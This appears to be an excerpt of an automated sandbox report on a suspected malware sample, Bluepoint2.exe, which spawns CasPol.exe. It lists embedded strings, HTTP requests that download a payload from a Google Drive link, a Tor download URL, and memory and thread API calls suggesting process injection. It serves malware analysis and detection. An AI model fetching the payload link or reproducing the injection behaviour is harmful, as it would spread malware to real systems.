            Source: Bluepoint2.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: Bluepoint2.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: Bluepoint2.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://www.avast.com0/
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
            Source: CasPol.exe, 0000000B.00000003.84178155401.000000001D89D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
            Source: CasPol.exe, 0000000B.00000003.84178155401.000000001D89D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
            Source: CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
            Source: CasPol.exe, 0000000B.00000003.84178155401.000000001D89D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
            Source: CasPol.exe, 0000000B.00000003.84177569419.0000000020904000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
            Source: CasPol.exe, 0000000B.00000002.88426909748.000000002095B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
            Source: CasPol.exe, 0000000B.00000003.84173493102.000000002095E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
            Source: CasPol.exe, 0000000B.00000003.84177569419.0000000020904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
            Source: CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88415904285.000000001D81A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88415904285.000000001D81A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: CasPol.exe, 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88417894520.000000001DAE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://COMTWSUUu1KHWCDXUrc.org
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
            Source: CasPol.exe, 0000000B.00000003.84078480008.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84078083345.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84077814955.00000000011D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
            Source: Bluepoint2.exeString found in binary or memory: https://d.symcb.com/cps0%
            Source: Bluepoint2.exeString found in binary or memory: https://d.symcb.com/rpa0
            Source: Bluepoint2.exeString found in binary or memory: https://d.symcb.com/rpa0.
            Source: CasPol.exe, 0000000B.00000003.84082718094.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-20-docs.googleusercontent.com/
            Source: CasPol.exe, 0000000B.00000002.88393971968.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-20-docs.googleusercontent.com/DJ
            Source: CasPol.exe, 0000000B.00000003.84082718094.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-20-docs.googleusercontent.com/L
            Source: CasPol.exe, 0000000B.00000003.84078480008.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88394157433.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84078083345.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88393681218.000000000116B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-20-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mltfd60q
            Source: CasPol.exe, 0000000B.00000002.88393971968.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-20-docs.googleusercontent.com/sJcf
            Source: CasPol.exe, 0000000B.00000002.88393681218.000000000116B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 0000000B.00000002.88393971968.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT
            Source: CasPol.exe, 0000000B.00000002.88393971968.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1octpIAVRhdcovKdwE5x43Ys6qBKX9XGToO
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eca.hinet.net/repository0
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
            Source: CasPol.exe, 0000000B.00000003.84177569419.0000000020904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
            Source: CasPol.exe, 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: CasPol.exe, 0000000B.00000003.84178091797.000000002094A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173448689.0000000020949000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1D8AA09A recv,11_2_1D8AA09A
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mltfd60qk512l24argm1l66nhg5fuhtt/1652377275000/13609515036127870368/*/1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-20-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49781 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49782 version: TLS 1.2
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_00405809
            Source: Bluepoint2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403640
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_00406D5F2_2_00406D5F
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_713C1BFF2_2_713C1BFF
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0336B3292_2_0336B329
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0335E7AF2_2_0335E7AF
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0336C8B92_2_0336C8B9
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0335FF072_2_0335FF07
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0336D7F82_2_0336D7F8
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_03364FF92_2_03364FF9
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_03361FE12_2_03361FE1
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_03364C3B2_2_03364C3B
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0336262C2_2_0336262C
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0335E0442_2_0335E044
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_033618A42_2_033618A4
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_033660A02_2_033660A0
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_03361AAF2_2_03361AAF
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_033612F52_2_033612F5
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_033656E92_2_033656E9
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FC56F6811_2_1FC56F68
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FC5A2B811_2_1FC5A2B8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1FC5A2B311_2_1FC5A2B3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_2065AC7411_2_2065AC74
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_2065007011_2_20650070
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_2065604011_2_20656040
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_2065C80011_2_2065C800
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_20658CB811_2_20658CB8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_20654A9811_2_20654A98
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_2065C3B711_2_2065C3B7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_20658C5711_2_20658C57
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_2065080811_2_20650808
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_20658C9C11_2_20658C9C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_207176D611_2_207176D6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_2071068011_2_20710680
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_2065E13011_2_2065E130
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0336EBFB NtResumeThread,2_2_0336EBFB
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0336E61C NtProtectVirtualMemory,2_2_0336E61C
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0336C8B9 NtAllocateVirtualMemory,2_2_0336C8B9
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1D8AAFDA NtQuerySystemInformation,11_2_1D8AAFDA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1D8AAFB8 NtQuerySystemInformation,11_2_1D8AAFB8
            Source: lang-1026.dll.2.drStatic PE information: No import functions for PE file found
            Source: C:\Users\user\Desktop\Bluepoint2.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: security.dllJump to behavior
            Source: Bluepoint2.exeStatic PE information: invalid certificate
            Source: Bluepoint2.exeVirustotal: Detection: 32%
            Source: Bluepoint2.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\Bluepoint2.exeFile read: C:\Users\user\Desktop\Bluepoint2.exeJump to behavior
            Source: Bluepoint2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Bluepoint2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Bluepoint2.exe "C:\Users\user\Desktop\Bluepoint2.exe"
            Source: C:\Users\user\Desktop\Bluepoint2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Bluepoint2.exe"
